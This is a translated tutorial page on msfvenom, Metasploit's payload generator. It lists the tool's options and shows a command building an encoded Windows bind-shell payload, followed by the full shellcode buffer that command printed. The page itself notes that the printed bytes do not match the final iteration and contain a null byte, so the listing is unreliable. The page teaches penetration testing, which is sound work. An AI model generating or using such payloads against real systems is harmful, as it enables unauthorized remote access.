Msfvenom
From www.metasploit-es.com.ar
msfvenom is a combination of msfpayload and msfencode, merging both tools into a single instance of the Framework. The advantages of msfvenom are:
- A single tool
- Standardized command-line options
- Increased speed
At this point msfvenom is still in its infancy, but it already offers many options:
root@bt:~# /pentest/exploits/framework3/msfvenom -h
Usage: /pentest/exploits/framework3/msfvenom [options]
Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-e, --encoder [encoder] The encoder to use
-a, --arch [architecture] The architecture to use
--platform [platform] The platform of the payload
-s, --space [length] The maximum size of the resulting payload
-b, --bad-chars [list] The list of characters to avoid example: '\x00\xff'
-i, --iterations [count] The number of times to encode the payload
-x, --template [path] Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-h, --help Show this message
An example of msfvenom usage:
root@bt:~# /pentest/exploits/framework3/msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
buf =
"\xdb\xdb\xbe\x0a\x3a\xfc\x6d\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x52\x31\x72\x18\x83\xea\xfc\x03\x72\x1e\xd8\x09\xb6" +
"\xce\xc5\x86\x6d\x1a\xa8\xd8\x88\xa8\xbc\x51\x64\xe5\xf2" +
"\xd1\xb7\x80\xed\x66\x72\x6e\x0d\x1c\x68\x6a\xae\xcd\x0e" +
"\x33\x90\x1d\x73\x82\xd8\xd7\xe0\x87\x76\xbd\x25\xf4\x23" +
"\x4d\x38\xc2\xc3\xe9\xa1\x7e\x31\xc5\xe4\x84\x2a\x3b\x37" +
"\xb3\xd6\x13\xc4\x09\x89\xd0\x95\x21\x10\x6b\x83\x94\x3d" +
"\xf2\xfd\x19\x36\x18\xc4\x0a\x45\x51\x12\xda\x65\x29\xfb" +
"\x8a\xdf\x29\x16\x88\xb9\x85\x9d\x55\x2b\x6e\x05\x60\xc9" +
"\x07\x2d\x3c\x33\xf7\xac\x6c\xbf\x4b\x6d\x91\x35\x29\x59" +
"\x38\xfe\x18\x38\x12\x72\xd4\x1d\xbd\x6d\x05\x79\xa6\x4e" +
"\x58\xb0\x4a\x0e\x4c\x05\x5e\x51\x45\x70\xdc\x90\x93\xa9" +
"\x21\x99\xd6\xab\xa7\x04\x11\x5d\x0e\x21\xa0\x96\xdd\x1f" +
"\x86\x39\x71\xab\xb1\x87\x58\xb3\xd1\x3a\x2d\x5f\xb3\x6f" +
"\xd0\xb1\x01\xf0\xed\x1c\x9f\x87\x59\x3d\x98\x80\xbb\x6d" +
"\xa8\x7e\x17\xc4\x3c\xb4\xef\x3c\x48\xbe\x07\x51\x04\x9f" +
"\x6f\xaf\xff\x16\xdc\x66\x77\xb4\x11\x00\xae\x0a\x66\x7b" +
"\x28\x2b\xd3\x19\x3e\xcb\x98\xbf\xfd\x7b\x14\x7a\xbf\xa2" +
"\x06\x46\x90\x19\x71\x6d\x28\xf5\x1c\xe5\x9c\x40\x88\x48" +
"\x5d\xe2\x89\xb2\xba\x21\x7b\xdb\xe1\x60\x70\x1e\x55\x93" +
"\x22\xf3\x6d\xbf\x5b\xc3\x74\x1e\x49\x43\x05\xdf\xdf\x9f" +
"\x3a\x9f\x80\xfe\xed\x8a\xa5\xf7\x09\xf5\xf8\x6b\x24\xbb" +
"\x20\x28\xfc\x03\x9a\xeb\xcf\x23\xbc\x50\xec\xca\x34\x3c" +
"\x58\x94\x18\xcb\x51\x71\x19\x5f\x2d\xbf\x58\x45\x86\x29" +
"\xb3\x9a\x87\x85\xf5\x40\x1d\xc6\x72\xbb\x3d\x60\x79\x3f" +
"\xff\xc7"
The command above generates a Windows bind shell encoded with three passes of shikata_ga_nai, with -b '\x00' telling the encoder to avoid null bytes in its output. Each pass prepends a 27-byte decoder stub, which is why the reported size grows from 325 to 352 to 379 bytes. Two cautions about the listing as reproduced on this page: it is 352 bytes long, which matches the second iteration rather than the final 379-byte result, and its seventeenth line contains a \x00. Do not copy shellcode from a page; regenerate it yourself and check the output against your bad-character list before using it, because the encoder's "succeeded" line only vouches for the bytes it produced, not for what survived a copy and paste.
© Offensive Security 2009
Original from www.offensive-security.com. Translated by cbk999.